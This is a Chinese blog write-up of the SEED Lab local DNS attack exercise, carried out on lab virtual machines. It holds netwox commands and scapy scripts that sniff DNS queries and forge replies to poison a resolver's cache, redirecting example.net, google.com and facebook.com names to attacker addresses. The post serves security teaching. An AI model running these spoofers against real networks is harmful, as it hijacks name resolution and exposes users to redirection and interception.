seed lab 2020 Local DNS Attack Report

最新推荐文章于 2023-10-30 16:09:40 发布
最新推荐文章于 2023-10-30 16:09:40 发布
阅读量2.8k 收藏 12
点赞数 1
分类专栏: seedlab
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44005234/article/details/110142171
版权
实验环境:

User Machine’s IP : 10.0.2.8
Attacker’s IP : 10.0.2.7
Local DNS Server : 10.0.2.4

Task 1

打开/etc/resolvconf/resolv.conf.d/head文件,然后添加将10.0.2.4作为DNS服务器的记录,并重启加载配置使记录生效:

$ sudo vim /etc/resolvconf/resolv.conf.d/head
nameserver 10.0.2.4
$ sudo resolvconf -u

查找dns server设置成功的证据:

$ dig www.baidu.com

在wireshark中看到10.0.2.8主机向10.0.2.4发送了dns请求,然后10.0.2.4作为本地dns主机代替10.0.2.8向199.7.83.42发送了dns请求报文:
在这里插入图片描述

Task 2
step 1 & step 2 & step 3

因为主机中的option文件已经按照要求设置好,我们只需要重启dns服务器即可

step 4
$ ping www.baidu.com

在wireshark中观察到10.0.2.4向10.0.2.8返回了dns标准记录:
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-H7TDzz0c-1606305766979)(./picture/3.png)]

Task 3
step1 & step 2 & step3

在本地dns服务器中的下面三个文件中存入实验指南中要求的记录:

$ sudo vim /etc/bind/named.conf
$ sudo vim /etc/bind/example.com.db
$ sudo vim /etc/bind/192.168.0.db
step 4

在用户主机上执行:

$ dig www.example.com

可以看到dns服务器返回了www.example.com的记录信息

Task 4

假定我们攻破了用户主机,我们在该主机上添加下面的记录:

$ sudo vim /etc/hosts
10.0.2.7 www.bank32.com

分别执行:

$ dig www.bank32.com
$ ping www.bank32.com

dig命令的结果没有受到影响:

ping命令的结果受到影响,直接显示了对应ip是10.0.2.7:

Task 5

我们的目标是将www.example.net的地址定向到10.0.2.7,为此我们用netwox返回ns.example.com到10.0.2.7的映射记录:

$ sudo netxow 105 --hostname www.example.net --hostnameip "10.0.2.7" --authns "ns.example.net" --authnsip "10.0.2.15" --device "enp0s3" --filter "src host 10.0.2.8"

可以看到dig的结果受到影响:

image-20201107113035952
Task 6

相比于每次攻击用户主机发出的dns报文的方法,直接攻击dns服务器可能是更好的选择。而由于dns服务器每次在遇到需要解析的主机名时都会先查看缓存,如果没有缓存再询问,所以我们选择攻击dns服务器的缓存。

首先我们清空dns服务器的缓存:

$ sudo rndc flush

在攻击主机执行:

$ sudo netwox 105 --hostname www.example.net --hostnameip "10.0.2.7" --authns "ns.example.net" --authnsip "10.0.2.15" --device "enp0s3" --filter "src host 10.0.2.4" --ttl 600 --spoofip raw

然后在用户主机执行:

$ dig www.example.net

我们通过dns服务器的wireshark观察到ip为10.0.2.7的攻击主机为dns服务器返回了dns应答报文

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-4PnmHuMB-1606305766979)(C:\Users\大菠萝\AppData\Roaming\Typora\typora-user-images\image-20201107115825701.png)]

在dns服务器执行(记录太多通过grep查找):

$ sudo rndc dumpdb -cache
$ sudo cat /var/cache/bind/dump.db |grep example

看到添加了ns.example.com的记录:

Task 7

根据需求编写代码:

from scapy.all import *
def spoof_dns(pkt):
        if (DNS in pkt and b'www.example.net' in pkt[DNS].qd.qname):
                IPpkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)
                UDPpkt = UDP(dport=pkt[UDP].sport, sport=53)

                Anssec = DNSRR(rrname=pkt[DNS].qd.qname, type='A',ttl=259200, rdata='10.0.2.7')
                NSsec1 = DNSRR(rrname='example.net', type='NS',ttl=259200, rdata='attacker32.com')
                Addsec1 = DNSRR(rrname='ns.attacker32.com', type='A',ttl=259200, rdata='10.0.2.15')

                DNSpkt = DNS(id=pkt[DNS].id, qd=pkt[DNS].qd, aa=1, rd=0, qr=1, qdcount=1,
                     ancount=1,nscount=1,arcount=1,an=Anssec, ns=NSsec1, ar=Addsec1)

                spoofpkt = IPpkt/UDPpkt/DNSpkt
                send(spoofpkt)

pkt = sniff(filter='udp and dst port 53', prn=spoof_dns)

用户端执行:

$ dig www.example.net

看到结果已经被修改,并且example.net域名下的地址都指向ns.attacker32.com域名

我们加载新的cache,看到attacker32.com.已经被当作权威域名:

接下来我们试图在用户主机上访问example.net域名下的地址hello.example.com:

$ dig hello.example.net

在wireshark上观察到dns服务器试图向attack32.com询问hello.example.net的ip地址,说明我们的攻击成功:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-XKk1ebhf-1606305766980)(C:\Users\大菠萝\AppData\Roaming\Typora\typora-user-images\image-20201107152334586.png)]

Task 8

根据要求再增加一条ns记录:

from scapy.all import *
def spoof_dns(pkt):
        if (DNS in pkt and b'www.example.net' in pkt[DNS].qd.qname):
                IPpkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)
                UDPpkt = UDP(dport=pkt[UDP].sport, sport=53)

                Anssec = DNSRR(rrname=pkt[DNS].qd.qname, type='A',ttl=259200, rdata='10.0.2.7')
                NSsec1 = DNSRR(rrname='example.net', type='NS',ttl=259200, rdata='attacker32.com')
                NSsec2 = DNSRR(rrname='google.com', type='NS',ttl=259200, rdata='attacker32.com')
                Addsec1 = DNSRR(rrname='ns.attacker32.com', type='A',ttl=259200, rdata='10.0.2.15')

                DNSpkt = DNS(id=pkt[DNS].id, qd=pkt[DNS].qd, aa=1, rd=0, qr=1, qdcount=1,ancount=1,nscount=2,arcount=1,an=Anssec, ns=NSsec1/NSsec2, ar=Addsec1)

                spoofpkt = IPpkt/UDPpkt/DNSpkt
                send(spoofpkt)

pkt = sniff(filter='udp and dst port 53', prn=spoof_dns)

可以看到增加了google.com的ns记录:

Task 9

增加两条附加记录:

from scapy.all import *
def spoof_dns(pkt):
        if (DNS in pkt and b'www.example.net' in pkt[DNS].qd.qname):
                IPpkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)
                UDPpkt = UDP(dport=pkt[UDP].sport, sport=53)

                Anssec = DNSRR(rrname=pkt[DNS].qd.qname, type='A',ttl=259200, rdata='10.0.2.7')
                NSsec1 = DNSRR(rrname='example.net', type='NS',ttl=259200, rdata='attacker32.com')
                NSsec2 = DNSRR(rrname='example.net', type='NS',ttl=259200, rdata='ns.example.net')
                Addsec1 = DNSRR(rrname='attacker32.com', type='A',ttl=259200, rdata='1.2.3.4')
                Addsec2 = DNSRR(rrname='ns.example.net', type='A',ttl=259200, rdata='5.6.7.8')
                Addsec3 = DNSRR(rrname='www.facebook.com', type='A',ttl=259200, rdata='3.4.5.6')

                DNSpkt = DNS(id=pkt[DNS].id, qd=pkt[DNS].qd, aa=1, rd=0, qr=1, qdcount=1,ancount=1,nscount=2,arcount=3,an=Anssec, ns=NSsec1/NSsec2, ar=Addsec1/Addsec2/Addsec3)

                spoofpkt = IPpkt/UDPpkt/DNSpkt
                send(spoofpkt)

pkt = sniff(filter='udp and dst port 53', prn=spoof_dns)

可以看到记录发生了改变:

大菠萝侦探
关注
  • 1
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Linux中如何使用Wireshark来分析数据包?
VirtualMan_M3的博客
03-29 1259
学习分析网络数据包是一项强大的技能。 当连接到网络后,大多数情况下我们不会去考虑实现这一切的底层网络协议。现在,当你阅读本文时,计算机正在交换大量数据包并通过Internet进行传输。 要了解这些协议,需要一个可以捕获并帮助你分析这些数据包的工具。Wireshark是一种流行的开源图形用户界面(GUI)工具,用于分析数据包。但是,它还为喜欢在Linux命令行上工作的人们提供了一个称为TShark的...
Local DNS Attack Lab
koko2015c的博客
02-24 3672
DNS(Domain Name System,域名系统),因特网上作为域名和IP地址相互映射的一个分布式数据库,能够使用户更方便的访问互联网,而不用去记住能够被机器直接读取的IP数串。通过主机名,最终得到该主机名对应的IP地址的过程叫做域名解析(或主机名解析)。DNS协议运行在UDP协议之上,使用端口号53。在RFC文档中RFC 2181对DNS有规范说明,RFC 2136对DNS的动态更新进行说明
无线渗透|Wi-Fi渗透思路
zkaqlaoniao的博客
10-30 142
对于WPA2 WPA3的一些渗透思路1.WPA2:是WPA的升级版,是针对保护无线网络安全而设计的无线网络保护系统,引入了PSK(预共享密钥模式)秘钥,加强了WPA的不足之处,但是因为使用了PSK,所以只要攻击者知晓目标的PSK秘钥,就能十分轻易加入无线网络。2.WPA3:是近几年新出现的无线网络安全保护系统,在WPA2的基础上实现了针对字典法暴力密码破解的难度,如果失败次数过多,AP将直接锁定攻击行为,以及取代了PSK使用对等实体验证(SAE)。
Linux|操作系统|应该知道的网络抓包知识(主要是wireshark,tcpdump)
zsk_john的技术分享专用博客
10-06 472
网络抓包工具的使用场景 网络安全测试 项目上线后,很可能有安全隐患问题需要处理,而网络到底哪些地方需要加强,哪些地方是符合安全标准的,这些需要使用抓包工具来获取实际的日志 2. 复杂网络问题的快速定位 某些项目可能网络环境会比较复杂,例如多种网络混杂,而有些问题会隐藏的比较深,比如,某个页面前端是可以正常打开,但你可能并不清楚此页面是否是预想的方式打开,或者网络某个地方出现了隐蔽的环路,这些比较复杂的问题还是使用抓包工具来快速的定位比较好的 3. 爬虫项目的目标嗅探 主要是爬
DNS缓存中毒实验】SEED labDNS Remote Attack Lab The Kaminsky Attack
04-11
DNS缓存中毒实验】SEED lab 远程DNS实验代码,The Kaminsky Attack Lab详情操作可见博客 原创代码,码字不易 实测可完成攻击,遇到问题,请及时联系博主。
Seed LabDNS Rebinding Attack Lab
cold_windx的博客
08-10 3877
本实验中模拟的物联网设备是一个恒温器,用于控制室内温度。客户端需要能够与服务器交互,以此设置温度。物联网设备在防火墙后面,外部设备不能与之交互,因此不能控制恒温器。为了击败防火墙保护,攻击代码必须首先进入内部网络。当来自内部网络的用户访问攻击者的网站时,攻击者的代码(JavaScript代码)实际上是从用户的浏览器中运行的,因此在受保护的内部网络中运行。然而,由于浏览器实现的沙箱保护,攻击者的代码仍然不能与物联网设备交互,即使它现在在内部网络中。...
Seed lab dns欺骗实验——dns local&dns remote
freedomDA的博客
11-20 7090
文章目录1. 实验2. 实验步骤及结果2.1 DNS _Local2.1.1 环境搭建容器部署DNS配置测试部署2.1.2 The Attack TasksTask 1: Directly Spoofing Response to UserTask 2: DNS Cache Poisoning Attack – Spoofing AnswersTask 3: Spoofing NS RecordsTask 4: Spoofing NS Records for Another DomainTask 5: Sp
EENG350-SEEDLABSEED_LAB
02-25
EENG350-SEEDLAB SEED_LAB
matlab中绿色的代码什么意思-SEED_Lab_2020:什瓦德团结
05-21
2020年Spring 1引言 本练习的目的是设计一个控制系统,该系统使用Arduino和Rasberry Pi以及机械编码器和照相机来调节连接到电动机的车轮的转速。 车轮沿圆周标记有数字0,π/ 2,π和3π/ 2,它们表示相对于0标记的...
seed数据集相关代码整理
07-01
上交的seed数据集,研究较少,下面是收集的一些工程文件,可以学习一下。前面是算法,后面是准确率。 1.4D-CNN,94% 2、新算法,93% 3.rgnn,67% 4.CNN+SVM,73% 5.DANN(数据,代码) 6.EEG_Classification_-...
Remote-DNS-Attack:远程DNS缓存攻击__山东大学网络攻防实验三__代码与资源
03-23
远程DNS攻击 远程DNS缓存攻击__山东大学网络攻防实验三__代码与资源,其他分开分别有重叠重叠实验,TCP / IP实验,XSS实验代码
SEED-XDS560v2 Driver.exe
06-04
驱动
DNS缓存污染实验】 SEED LAB 远程DNS 缓存中毒--Kaminsky 攻击复现
PsgQ的博客
04-11 3336
SEED LAB 远程DNS 缓存中毒–Kaminsky 攻击复现 0x00 搭建实验环境 使用3台Ubuntu 16.04虚拟机,可到下面的参考链接下载 攻击的服务是BIND9,由于条件限制,这里使用本地的一台虚拟机当作远程DNS解析器,关闭了DNSSEC服务,其中三台机器IP地址,如下图所示: 具体的实验环境搭建过程,可参考:SEED Lab Description 配置User VM: 在用户机 的 /etc/resolvconf/resolv.conf.d/head文件中,加入下面语句,将
Seedlabs】Local DNS Attack Lab
seven49的博客
04-07 3382
目录 一、实验概述 二、实验环境 2.1 测试 DNS 设置 三、实验内容 域名解析 Answers 毒化 2、域名解析 NS 毒化 3、kaminsky 攻击 一、实验概述 DNS (Domain Name System) is the Internet’s phone book; it translates hostnames to IP addresses (and vice versa). This translation is through DNS resolution...
SeedLab7: Local DNS Attack Lab
Rachel_IS的博客
01-19 3624
这次是三个DNS 好处是配一次环境就行 Local应该是最容易的,因为直接通过嗅探伪造DNS包 Task 1 在resolv.conf.d/head 里写入Server的地址 然后dig试一下,没问题的话返回的SERVER字段就是写入的那个IP (如果看到127.0.0.1,可以把/etc/resolv.conf中其他的server注释掉再试一下 Task 2 跟着教程配,再重启bind 9即可 此时在User主机使用ping,能看到先向DNS服务器获得IP,然后再发送ICMP数据包 第一次查询的
SeedLab8: Remote DNS Attack (Kaminsky Attack) Lab
Rachel_IS的博客
01-19 2350
做完了本地的,来康康远程的 难点就是不能嗅探数据包再进行伪造了,一些字段要通过猜测得到 Task 1 local里配过了,验证一下就行 Task 2 按教程配一条转发 (因为我们自己设置的域名是真实存在的…如果将其作为权威服务器,那么本地DNS服务器会向顶级DNS服务器请求它的IP,然后发送请求,但是这就超出了我们的控制范围 (配一条转发,就是让DNS服务器把对这个权威服务器的请求都发往我们能控制的IP 其他的按教程删改 Task 3 attacker上配两个zone文件(网站上下载模版 (这里要注
SEED-Lab) DNS_Local Attack Lab
lunan的博客
02-17 5225
SEED-Lab) DNS_Local Attack Lab 欢迎大家访问我的GitHub博客 https://lunan0320.cn 文章目录(SEED-Lab) DNS_Local Attack Lab一、实验目标二、实验原理三、实验过程Part I Setting Up a Local DNS Server3.1 Task 1: Confifigure the User Machine3.2 Task 2: Set up a Local DNS ServerStep 1: Confifigu
Seed lab:Remote DNS Attack
pang241的专栏
05-27 3538
实验环境:服务器ip:192.168.86.139Victim ip: 192.168.86.137Attacker ip:192.168.86.138准备工作: 安装bind9服务器:在bind9官网 下载bind9,在此下载的是bind9.10.4 解压文件tar -xzvf bin9.10.4.tar.gz cd bin9.10.4,并./configure –prefix=/usr/loca
远程DNS缓存攻击__网络攻防实验三
热门推荐
z轴的博客
12-07 1万+
一、实验描述 DNS(Domain Name System)是一个多层次的分布式数据库系统,其基本功能是完成域名解析,即提供域名和IP 地址之间的映射关系,为Internet 用户提供便利。DNS 服务器只记录本地资源的所有授权主机,若想查询非本地的主机信息, 则要向信息持有者(权威DNS 服务器)发送查询请求。为了避免每次查询都发送请求,DNS 服务器会把权威DNS 服务器返回的查询结果保存...
seedubuntu20.04中的remote attack
最新发布
12-24
SeedUbuntu20.04中,远程攻击是指通过网络或其他远程方式对系统进行攻击的行为。 首先,SeedUbuntu20.04系统存在的某些弱点可能会被黑客利用,比如一些未经修复的漏洞或者配置不当的网络设置。黑客可以利用这些弱点,通过远程网络渗透到系统内部,以获取敏感信息、控制系统或者破坏系统的正常运行。 其次,SeedUbuntu20.04系统中的远程攻击可能包括网络钓鱼、恶意软件传播、拒绝服务攻击等方式。黑客可以通过发送欺骗性的电子邮件或者创建虚假的网站来诱使用户泄露个人信息或安装恶意软件。此外,黑客也可以利用大规模的请求来攻击系统,导致系统无法正常运行。 为了应对SeedUbuntu20.04系统中的远程攻击,用户可以采取一些安全措施,比如使用防火墙、安装并及时更新杀毒软件、定期备份重要数据等。此外,定期检查系统漏洞、加强用户训练以及加强对远程访问的控制也是防范远程攻击的重要步骤。 总之,在SeedUbuntu20.04系统中远程攻击是需要引起重视的安全问题,用户需要保持警惕并采取相应措施来确保系统的安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值